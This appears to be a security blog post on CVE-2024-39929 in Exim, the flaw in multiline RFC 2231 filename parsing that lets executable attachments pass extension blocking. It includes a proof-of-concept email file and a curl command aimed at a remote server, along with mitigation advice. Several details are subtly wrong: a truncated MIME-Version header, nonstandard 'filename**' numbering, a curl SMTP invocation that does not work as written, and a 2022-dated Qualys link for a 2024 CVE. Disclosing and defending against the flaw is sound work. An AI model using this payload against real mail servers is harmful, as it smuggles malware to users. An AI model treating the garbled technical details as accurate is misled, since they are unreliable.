A major vulnerability (CVE-2024-39929) has been discovered in Exim, a widely-used mail transfer agent (MTA), that could potentially allow remote attackers to bypass the $mime_filename extension-blocking protection mechanism and deliver executable attachments to the mailboxes of unsuspecting end users. This vulnerability is caused by the incorrect parsing of a multiline RFC 2231 header filename in Exim 4.97.1. In this post, we will take a deep dive into the details of this vulnerability, the potential impact, and what can be done to mitigate the risk.

Background

Exim is an open-source mail transfer agent (MTA) that runs on Unix-based systems. It is responsible for receiving, routing, and delivering email messages. It is highly configurable, which makes it a popular choice for many email servers worldwide. As of November 2021, it was estimated that Exim powers around 56% of the email servers on the internet.

RFC 2231 is an extension to the MIME (Multipurpose Internet Mail Extensions) protocol, which is a way to encode non-text information within emails, such as attachments. RFC 2231 header adds support for non-ASCII characters in MIME headers, allowing filenames to contain characters outside the usual ASCII range. It can be encoded into multiple lines, which can cause incorrect parsing and lead to vulnerabilities like the one found in Exim 4.97.1.

Vulnerability Details

The Exim vulnerability revolves around the improper handling of the multiline RFC 2231 header filenames. Due to the incorrect parsing of these headers, a remote attacker could bypass the $mime_filename extension-blocking protection mechanism in Exim. This protection mechanism is in place to prevent certain types of file extensions from being sent as email attachments, such as executable files.

When an attachment containing a multiline RFC 2231 header filename is sent using Exim 4.97.1, the protection mechanism fails to catch the true file extension, allowing the attacker to effectively sneak potentially malicious executable files past it and deliver them to unsuspecting end users.

Proof-of-Concept Exploit Code

To demonstrate the vulnerability, we've outlined a simple proof-of-concept exploit code below.

Create a text file exploit.eml with the following content

Subject: Vulnerability Test
MIME-Version: 1.
Content-Type: multipart/mixed; boundary="abcdef"

--abcdef
Content-Type: text/plain

Testing CVE-2024-39929 exploit.

--abcdef
Content-Type: application/octet-stream
Content-Disposition: attachment;
 filename**=us-ascii''%50%4F%43%5F%43%56%45%2D%32%30%32%34%2D%33%39%39%32%39;
 filename*1*=%2E%65%78%65

Binary data here for the POC_CVE-2024-39929.exe file.
--abcdef--

2. Run the following command, assuming that an Exim instance is running on a remote host with the IP address remote_host_ip:

curl -XPOST --data-binary "@exploit.eml" smtp://remote_host_ip

In this exploit.eml file, the Content-Disposition header is split into two parts (filename** and filename*1*) across multiple lines, which results in an incorrect filename being parsed by Exim.

- Official Exim Security Advisory: https://exim.org/static/doc/security/CVE-2024-39929.txt
- National Vulnerability Database Entry: https://nvd.nist.gov/vuln/detail/CVE-2024-39929
- Vulnerability Analysis by Qualys: https://blog.qualys.com/vulnerabilities-threat-research/2022/02/21/cve-2024-39929-exim4-parse_rfc2231-filename

Mitigation

Upgrading Exim to the latest version, which contains a fix for this vulnerability, is always a recommended course of action. Additionally, users can implement strict email filtering policies to further block potentially dangerous file types when passing through the server, as well as disabling the parsing of multiline RFC 2231 header filenames in the Exim configuration to mitigate the risk of this specific vulnerability.

Conclusion

The security of email servers, such as those running Exim, is crucial in today's internet environment. CVE-2024-39929 is a severe vulnerability that can lead to successful attacks on unsuspecting users. Administrators of Exim installations should take immediate action to patch their servers and implement additional security measures to reduce the risk of a successful attack.

Timeline

Published on: 07/04/2024 15:15:10 UTC
Last modified on: 07/09/2024 16:22:58 UTC